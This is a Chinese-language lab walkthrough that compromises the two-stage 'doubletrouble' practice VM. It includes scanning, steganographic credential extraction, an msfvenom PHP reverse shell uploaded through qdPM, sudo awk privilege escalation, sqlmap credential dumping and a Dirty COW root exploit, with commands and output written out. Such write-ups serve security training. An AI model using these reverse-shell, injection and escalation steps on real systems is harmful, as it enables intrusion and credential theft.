1.安装好doubletrouble靶机,界面如下:(kali:192.168.0.104;靶机:192.168.0.110)
为Debian,没有发现较明显的信息
2.开始扫描端口
$ nmap -Pn 192.168.0.110
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-26 03:48 EST
Nmap scan report for 192.168.0.110
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
发现开启了ssh和http
3.开始目录扫描
$ dirb http://192.168.0.110 -X .php,.txt,.zip
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan 26 03:52:00 2022
URL_BASE: http://192.168.0.110/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.zip,.php,.txt) | (.zip)(.php)(.txt) [NUM = 3]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.110/ ----
+ http://192.168.0.110/check.php (CODE:200|SIZE:0)
+ http://192.168.0.110/index.php (CODE:200|SIZE:5812)
+ http://192.168.0.110/readme.txt (CODE:200|SIZE:470)
+ http://192.168.0.110/robots.txt (CODE:200|SIZE:26)
-----------------
END_TIME: Wed Jan 26 03:52:02 2022
DOWNLOADED: 13836 - FOUND: 4
发现有check.php index.php robots.txt readme.txt
只有index.php有用
再整体扫描一遍
$ dirb http://192.168.0.110
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan 26 03:57:04 2022
URL_BASE: http://192.168.0.110/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.110/ ----
==> DIRECTORY: http://192.168.0.110/backups/
==> DIRECTORY: http://192.168.0.110/batch/
==> DIRECTORY: http://192.168.0.110/core/
==> DIRECTORY: http://192.168.0.110/css/
+ http://192.168.0.110/favicon.ico (CODE:200|SIZE:894)
==> DIRECTORY: http://192.168.0.110/images/
+ http://192.168.0.110/index.php (CODE:200|SIZE:5812)
==> DIRECTORY: http://192.168.0.110/install/
==> DIRECTORY: http://192.168.0.110/js/
+ http://192.168.0.110/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.0.110/secret/
+ http://192.168.0.110/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.0.110/sf/
==> DIRECTORY: http://192.168.0.110/template/
==> DIRECTORY: http://192.168.0.110/uploads/
---- Entering directory: http://192.168.0.110/backups/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/batch/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/core/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/install/ ----
==> DIRECTORY: http://192.168.0.110/install/actions/
==> DIRECTORY: http://192.168.0.110/install/css/
==> DIRECTORY: http://192.168.0.110/install/images/
+ http://192.168.0.110/install/index.php (CODE:200|SIZE:1815)
==> DIRECTORY: http://192.168.0.110/install/lib/
==> DIRECTORY: http://192.168.0.110/install/modules/
---- Entering directory: http://192.168.0.110/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/secret/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/sf/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/template/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/install/actions/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/install/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/install/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/install/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/install/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Jan 26 03:57:06 2022
DOWNLOADED: 9224 - FOUND: 5
访问 http://192.168.0.110 时,界面如下:
访问 http://192.168.0.110/secret 时,发现有一张图片
访问 http://192.168.0.110/uploads 时,发现有一个可以查看文件上传的目录(考虑上传php反弹shell,并且想到应该要先登录“qdPM”)
其余网页上也没有什么重要信息
4.从图片开始,也许图片中会有一下隐藏的信息
使用 stegseek 工具去寻找图片信息https://github.com/RickdeJager/stegseek
$ stegseek ./doubletrouble.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "92camaro"
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".
$ cat doubletrouble.jpg.out
otisrush@localhost.com
otis666
估莫着 应该就是“qdPM”的帐号和密码
5.尝试去登录,成功登录,寻找上传文件的入口
最终发现 点击右上角头像 选择“my details” 界面如下
通过 choose file 和 save 上传文件
6.使用msfvenom生成php反弹shell代码Msfvenom命令总结大全_卿's Blog-CSDN博客
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.104 LPORT=9000 -o 9000.php
记得打开php文件 将开头的“/*”删去!!!然后上传该文件
7.浏览器访问 http://192.168.0.110/uploads/users
看后面日期 发现上传成功
8.msfconsole 在本地监听端口(我使用9000端口监听)
$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set lhost 192.168.0.104
msf6 exploit(multi/handler) > set lport 9000
msf6 exploit(multi/handler) > run
9.访问 http://192.168.0.110/uploads/users 点击上传的9000.php,触发反弹连接
连接成功
meterpreter > shell
Process 871 created.
Channel 0 created.
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
10.提升权限Linux 提权的各种姿势总结_weixin_45116657的博客-CSDN博客_awk提权
sudo -l
Matching Defaults entries for www-data on doubletrouble:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on doubletrouble:
(ALL : ALL) NOPASSWD: /usr/bin/awk
发现可以sudo无密码执行awk
sudo awk 'BEGIN {system("/bin/sh")}'
whoami
root
cd /root
ls -l
total 403460
-rw-r--r-- 1 root root 413142528 Sep 11 10:49 doubletrouble.ova
果然是 doubletrouble 里面还有一个靶机
11.将靶机下载下来,并在virtualbox打开
在靶机shell中输入
python3 -m http.server 8888
在kali中输入
$ wget http://192.168.0.110:8888/doubletrouble.ova
然后就可以关闭1号靶机了
12.开启2号靶机 界面如下(kali:192.168.0.104;靶机:192.168.0.111)
13.扫描端口
$ nmap -Pn 192.168.0.111
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-26 05:54 EST
Nmap scan report for 192.168.0.111
Host is up (0.000076s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds
再目录扫描
$ dirb http://192.168.0.111
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan 26 05:50:23 2022
URL_BASE: http://192.168.0.111/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.111/ ----
+ http://192.168.0.111/cgi-bin/ (CODE:403|SIZE:289)
+ http://192.168.0.111/index.php (CODE:200|SIZE:615)
+ http://192.168.0.111/server-status (CODE:403|SIZE:294)
-----------------
END_TIME: Wed Jan 26 05:50:24 2022
DOWNLOADED: 4612 - FOUND: 3
发现只有index.php有用(其他回应都是403)
14.访问 http://192.168.0.111
要让我们登录,又想到了数据库
15.开始数据库扫描
$ sqlmap -u http://192.168.0.111/index.php?id=1 --forms --current-db
...(一路都是yes)
current database: 'doubletrouble'
...
$ sqlmap -u http://192.168.0.111/index.php?id=1 --forms -D doubletrouble --tables
...(一路都是yes)
Database: doubletrouble
[1 table]
+-------+
| users |
+-------+
...
$ sqlmap -u http://192.168.0.111/index.php?id=1 --forms -D doubletrouble -T users --columns
...(一路都是yes)
Database: doubletrouble
Table: users
[2 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+
...
$ sqlmap -u http://192.168.0.111/index.php?id=1 --forms -D doubletrouble -T users --dump
...(一路都是yes)
Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| password | username |
+----------+----------+
| GfsZxc1 | montreux |
| ZubZub99 | clapton |
+----------+----------+
...
发现了2对用户名和密码 经过试验 发现都无法登录 然后再去尝试登录ssh 发现只有clapton帐号可以登录
$ ssh clapton@192.168.0.111
clapton@192.168.0.111's password:
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan 26 02:12:00 2022 from 192.168.0.104
clapton@doubletrouble:~$ whoami
clapton
clapton@doubletrouble:~$ id
uid=1000(clapton) gid=1000(clapton) groups=1000(clapton)
clapton@doubletrouble:~$ uname -a
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
获得了系统的版本 去搜索是否有漏洞可以利用 提升权限
16.本地权限提升
搜索后果然发现有漏洞 GitHub - FireFart/dirtycow
在本地下载好C文件后,进入靶机shell新建一个C文件复制粘贴进去,然后编译
clapton@doubletrouble:~$ gcc ./dirty.c -o dirtycow
运行
clapton@doubletrouble:~$ chmod +x dirtycow
clapton@doubletrouble:~$ ./dirtycow 123456
17.这个程序会新建一个名叫firefart的root用户
clapton@doubletrouble:~$ su firefart
Password:
firefart@doubletrouble:/home/clapton# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@doubletrouble:/home/clapton# whoami
firefart
或,关闭窗口,重新连接ssh
$ ssh firefart@192.168.0.111
firefart@192.168.0.111's password:
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan 26 02:38:26 2022
firefart@doubletrouble:~# whoami
firefart
firefart@doubletrouble:~# id
uid=0(firefart) gid=0(root) groups=0(root)
18.到此全部完成